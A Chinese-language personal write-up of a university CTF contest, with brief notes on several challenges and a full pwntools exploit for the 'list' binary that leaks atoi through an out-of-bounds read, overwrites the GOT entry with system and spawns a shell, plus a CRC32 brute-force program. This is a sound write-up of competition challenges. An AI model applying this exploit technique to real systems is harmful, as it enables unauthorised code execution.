第三届上海市大学生网络安全大赛-总结

给自己看的一点比赛的总结与反思~

比赛都结束一周啦，之所以现在才写是因为之前一直在医院躺着，才出来啊不过这次的比赛还是有写的必要的，因为这几个月来参加的全都是浪费时间的比赛，这次的总算是有点收获

Some Words

我没看，知道有人SQLmap跑出来表名，不知道最后能不能把所有信息拿到，看他们做觉得还是需要平时多写些通用脚本，那样速度会快很多。

Welcome To My Blog

非常有意思的一道题，宁宁说秒做，于是我也去试了下，看到url后面有个action=情不自禁加了个flag然后，200婚~

Step By Step

robots.txt里面说了源码位置，下下来是加密过的，作为人民币玩家（逃，百度了下，花了7.5把它解出来了，本来还剩3元，结果忘记账号了，虽然据说后来官方说了可以不用花钱，但是我们这时已经做出来了(smail cry)，解密后就简单了，爆破随机种子再考下弱类型什么的
好呗，附上免费的脚本：http://sec2hack.com/web/phpjiami-decode.html

juckcode

逐位爆破这种方式，以后别忘了（嗯，我没有看这道题..

classical

还以为是enigma，后来学弟试了下base64编码flag再移位，和它很像，于是就是咯
（要是线下断网没有这个词频分析网站就GG了，吓得我赶紧去找下离线的脚本）

rrrsa

不是我做的，只想说队友需要补点姿势，不然这次可能就进去了，超时1分钟做出来~

list

只能说自己学艺不精，很早就发现低地址读写与利用atoi得shell了，但是怎么都找不到跳板，卡死在这里，看wp才想起来rel有元素是指向got的，气！

分析

利用的是这三个函数：



stringCount可以向下越界，而stringTables存的是地址，需要一个指向目标的地址，当时就死在这里了。

利用

万万没想到，.rel.plt的r_offset域指向了got，于是通过它泄露一个地址并且写入一个地址，使用readelf获取这个地址：

➜  Downloads readelf -x .rela.plt list 

Hex dump of section '.rela.plt':
  0x00400510 18206000 00000000 07000000 01000000 . `.............
  0x00400520 00000000 00000000 20206000 00000000 ........  `.....
  0x00400530 07000000 02000000 00000000 00000000 ................
  0x00400540 28206000 00000000 07000000 03000000 ( `.............
  0x00400550 00000000 00000000 30206000 00000000 ........0 `.....
  0x00400560 07000000 04000000 00000000 00000000 ................
  0x00400570 38206000 00000000 07000000 07000000 8 `.............
  0x00400580 00000000 00000000 40206000 00000000 ........@ `.....
  0x00400590 07000000 08000000 00000000 00000000 ................
  0x004005a0 48206000 00000000 07000000 09000000 H `.............
  0x004005b0 00000000 00000000                   ........

➜  Downloads

于是就可以写出利用代码：

#!/usr/bin/env python
# coding=utf-8
from pwn import *

elf = ELF('list')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

p = process('list')
atoiRelPltAddr = 0x00400588
stringTables = 0x000000000602080
stringCount = 0

##低地址读
def readAddr(count):
	for i in range(count):	
		p.recv()
		p.sendline('4')
		if i%10000==0:
			print i
	print p.recv()
	p.sendline('2')
	lala = p.recv(8)
	lala = lala[:lala.find('\n')]+'\x00'*(len(lala)-lala.find('\n'))
	print lala
	addr = u64(lala)
	return addr

##低地址写
def writeAddr(data,count):
	for i in range(count):
		p.recv()
		p.sendline('4')
#	gdb.attach(p)
	p.sendline('3')
	p.send(p64(data))

##泄露出atoi地址
stringCount = (stringTables - atoiRelPltAddr)/8 - stringCount
print stringCount
atoiAddr = readAddr(stringCount)
print hex(atoiAddr)

##计算出system
systemAddr = atoiAddr - (libc.symbols['atoi']-libc.symbols['system'])
print hex(systemAddr)

##将system写入atoi
writeAddr(systemAddr,0)

## 调用它
p.send('/bin/sh\0')
p.interactive()

结果：

p200

提示的很明显了是个uaf，然鹅看到c++代码就怂了，知道这道题很简单就是不敢做，好气哦！

登机牌

这道题，告诉自己要注意给的每一个细节，还有网站很重要，似乎只有这个网站能识别成功！

clemency

哎，知道这是传说中的中端序、9bit，然鹅入坑里了，以为是给的程序运行时会读取flag.enc文件然后进行解密，使用模拟器调试，又是读指令集最后还是没弄出来，结果太气啦，后来看wp，直接用ida的就可以弄出来了。

流量分析

第一次遇到这种流量分析，其实满屏的tls也是够可疑的，看wp是这样做的：
因为tls目的就是传输过程中加密，抓包是不能获取密码的，但是ftp-data里面有给每次通信的key，导入就可以解密关键的通信了，那里面有个是传zip，将其导出，是个音频，结尾杂音频谱还是啥的就能看到密码，再解压获得的flag.zip即可：

crc32

不是上次的题，只是今天队友遇到了，py太慢就找了个C的，稍作修改，然后记在这里吧~

# include<string.h>
# include <stdio.h>

//来自：https://github.com/ETrun/crc32/blob/master/crc32.c
static unsigned long Crc32_ComputeBuf(const void *buf, size_t bufLen) {
	static const unsigned long crcTable[256] = {
		0x00000000,0x77073096,0xEE0E612C,0x990951BA,0x076DC419,0x706AF48F,0xE963A535,
		0x9E6495A3,0x0EDB8832,0x79DCB8A4,0xE0D5E91E,0x97D2D988,0x09B64C2B,0x7EB17CBD,
		0xE7B82D07,0x90BF1D91,0x1DB71064,0x6AB020F2,0xF3B97148,0x84BE41DE,0x1ADAD47D,
		0x6DDDE4EB,0xF4D4B551,0x83D385C7,0x136C9856,0x646BA8C0,0xFD62F97A,0x8A65C9EC,
		0x14015C4F,0x63066CD9,0xFA0F3D63,0x8D080DF5,0x3B6E20C8,0x4C69105E,0xD56041E4,
		0xA2677172,0x3C03E4D1,0x4B04D447,0xD20D85FD,0xA50AB56B,0x35B5A8FA,0x42B2986C,
		0xDBBBC9D6,0xACBCF940,0x32D86CE3,0x45DF5C75,0xDCD60DCF,0xABD13D59,0x26D930AC,
		0x51DE003A,0xC8D75180,0xBFD06116,0x21B4F4B5,0x56B3C423,0xCFBA9599,0xB8BDA50F,
		0x2802B89E,0x5F058808,0xC60CD9B2,0xB10BE924,0x2F6F7C87,0x58684C11,0xC1611DAB,
		0xB6662D3D,0x76DC4190,0x01DB7106,0x98D220BC,0xEFD5102A,0x71B18589,0x06B6B51F,
		0x9FBFE4A5,0xE8B8D433,0x7807C9A2,0x0F00F934,0x9609A88E,0xE10E9818,0x7F6A0DBB,
		0x086D3D2D,0x91646C97,0xE6635C01,0x6B6B51F4,0x1C6C6162,0x856530D8,0xF262004E,
		0x6C0695ED,0x1B01A57B,0x8208F4C1,0xF50FC457,0x65B0D9C6,0x12B7E950,0x8BBEB8EA,
		0xFCB9887C,0x62DD1DDF,0x15DA2D49,0x8CD37CF3,0xFBD44C65,0x4DB26158,0x3AB551CE,
		0xA3BC0074,0xD4BB30E2,0x4ADFA541,0x3DD895D7,0xA4D1C46D,0xD3D6F4FB,0x4369E96A,
		0x346ED9FC,0xAD678846,0xDA60B8D0,0x44042D73,0x33031DE5,0xAA0A4C5F,0xDD0D7CC9,
		0x5005713C,0x270241AA,0xBE0B1010,0xC90C2086,0x5768B525,0x206F85B3,0xB966D409,
		0xCE61E49F,0x5EDEF90E,0x29D9C998,0xB0D09822,0xC7D7A8B4,0x59B33D17,0x2EB40D81,
		0xB7BD5C3B,0xC0BA6CAD,0xEDB88320,0x9ABFB3B6,0x03B6E20C,0x74B1D29A,0xEAD54739,
		0x9DD277AF,0x04DB2615,0x73DC1683,0xE3630B12,0x94643B84,0x0D6D6A3E,0x7A6A5AA8,
		0xE40ECF0B,0x9309FF9D,0x0A00AE27,0x7D079EB1,0xF00F9344,0x8708A3D2,0x1E01F268,
		0x6906C2FE,0xF762575D,0x806567CB,0x196C3671,0x6E6B06E7,0xFED41B76,0x89D32BE0,
		0x10DA7A5A,0x67DD4ACC,0xF9B9DF6F,0x8EBEEFF9,0x17B7BE43,0x60B08ED5,0xD6D6A3E8,
		0xA1D1937E,0x38D8C2C4,0x4FDFF252,0xD1BB67F1,0xA6BC5767,0x3FB506DD,0x48B2364B,
		0xD80D2BDA,0xAF0A1B4C,0x36034AF6,0x41047A60,0xDF60EFC3,0xA867DF55,0x316E8EEF,
		0x4669BE79,0xCB61B38C,0xBC66831A,0x256FD2A0,0x5268E236,0xCC0C7795,0xBB0B4703,
		0x220216B9,0x5505262F,0xC5BA3BBE,0xB2BD0B28,0x2BB45A92,0x5CB36A04,0xC2D7FFA7,
		0xB5D0CF31,0x2CD99E8B,0x5BDEAE1D,0x9B64C2B0,0xEC63F226,0x756AA39C,0x026D930A,
		0x9C0906A9,0xEB0E363F,0x72076785,0x05005713,0x95BF4A82,0xE2B87A14,0x7BB12BAE,
		0x0CB61B38,0x92D28E9B,0xE5D5BE0D,0x7CDCEFB7,0x0BDBDF21,0x86D3D2D4,0xF1D4E242,
		0x68DDB3F8,0x1FDA836E,0x81BE16CD,0xF6B9265B,0x6FB077E1,0x18B74777,0x88085AE6,
		0xFF0F6A70,0x66063BCA,0x11010B5C,0x8F659EFF,0xF862AE69,0x616BFFD3,0x166CCF45,
		0xA00AE278,0xD70DD2EE,0x4E048354,0x3903B3C2,0xA7672661,0xD06016F7,0x4969474D,
		0x3E6E77DB,0xAED16A4A,0xD9D65ADC,0x40DF0B66,0x37D83BF0,0xA9BCAE53,0xDEBB9EC5,
		0x47B2CF7F,0x30B5FFE9,0xBDBDF21C,0xCABAC28A,0x53B39330,0x24B4A3A6,0xBAD03605,
		0xCDD70693,0x54DE5729,0x23D967BF,0xB3667A2E,0xC4614AB8,0x5D681B02,0x2A6F2B94,
		0xB40BBE37,0xC30C8EA1,0x5A05DF1B,0x2D02EF8D
	};
	unsigned long crc32 = 0xFFFFFFFF;
	unsigned char *byteBuf;
	size_t i;

	byteBuf = (unsigned char*)buf;
	for (i = 0; i < bufLen; i++) {
		crc32 = (crc32 >> 8) ^ crcTable[(crc32 ^ byteBuf[i]) & 0xFF];
	}
	return crc32 ^ 0xFFFFFFFF;
}

static char *charSet = "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_@\n ";


int main() {
	unsigned long crc32[] = { 1606238046, 1943531056, 3598719407L, 2578797435L, 1405086858, 2143805016, 3234701029L, 3224637410L, 
		2346013297L, 1146766327, 4038678768L, 3119445409L, 2111148220, 383413051, 2853461348L, 3176759361L, 1852520927, 
		3083243303L, 2151747034L, 1392140456, 544449252, 1871340857, 574988077, 3459049483L, 2786065872L, 3888485555L, 
		1716930793, 1933746678, 3178216769L, 3774357278L, 622718466, 1488109481, 525106857, 3123386181L, 3472027048L, 
		616379830, 3728848209L, 1358333123, 1852520927, 3096466191L, 622718466
	};

	char tmp[6] = "";
	int len = strlen(charSet);
	for (int h = sizeof(crc32) / sizeof(unsigned long) - 1;h>=0; h--) {
		for (int a = 0; a < len; a++) {
			tmp[0] = charSet[a];
			for (int b = 0; b < len; b++) {
				tmp[1] = charSet[b];
				for (int c = 0; c < len; c++) {
					tmp[2] = charSet[c];
					for (int d = 0; d < len; d++) {
						tmp[3] = charSet[d];
						for (int e = 0; e < len; e++) {
							tmp[4] = charSet[e];
							if (Crc32_ComputeBuf(tmp, strlen(tmp)) == crc32[h]) {
								printf("%s", tmp);
								//goto label;				//若是存在碰撞，那么这里可以将这里注释掉
							}
						}
					}
				}
			}
		}
		label :	;
		printf("\n");
	}
	return 0;
}